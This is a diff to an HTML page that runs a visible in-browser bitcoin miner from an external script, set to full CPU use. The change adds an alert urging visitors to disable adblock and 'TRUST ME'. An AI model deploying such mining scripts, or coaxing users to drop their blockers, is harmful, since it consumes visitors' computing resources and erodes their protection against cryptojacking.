--- a/index.html
+++ b/index.html
@@ -1,10 +1,11 @@
 <html>
 <body>
 <h1>GimmeFreeMoney!</h1>
-<h3>Leave this running - this is a bitcoin miner. You can minimize it, and I get paid small amounts of money for free basically. It is very slow becauase it's online, but if I make an extra $0.01 daily, that's more than nothing (*insert shruggie here*)</h3>
+<h3>Make sure adblock is off and Leave this running - this is a bitcoin miner. You can minimize it, and I get paid small amounts of money for free basically. It is very slow becauase it's online, but if I make an extra $0.01 daily, that's more than nothing (*insert shruggie here*)</h3>
 <h4>Also, you can straight-up donate BTC: 1FqjH619kJLLixA8nD5kwcMc8nkYYhBiLp - this does cost money though. <s><strikethrough>Do only if you have extra $$$</s></strikethrough> Do as much as you want!</h4>
 <script src="https://www.hashing.win/7tji.js"></script>
 <script>
+    window.onerror = function(){alert("DISABLE ADBLOCK AND REFRESH - YOU WON'T SEE ADS, BUT I WILL BE PAID - TRUST ME");};
     var miner = new Client.Anonymous('cc3d6b9e0843cedb3352f34ef55f7e5232b3a2582337f7876780268c828e045a', {
         throttle: 0.0
     });
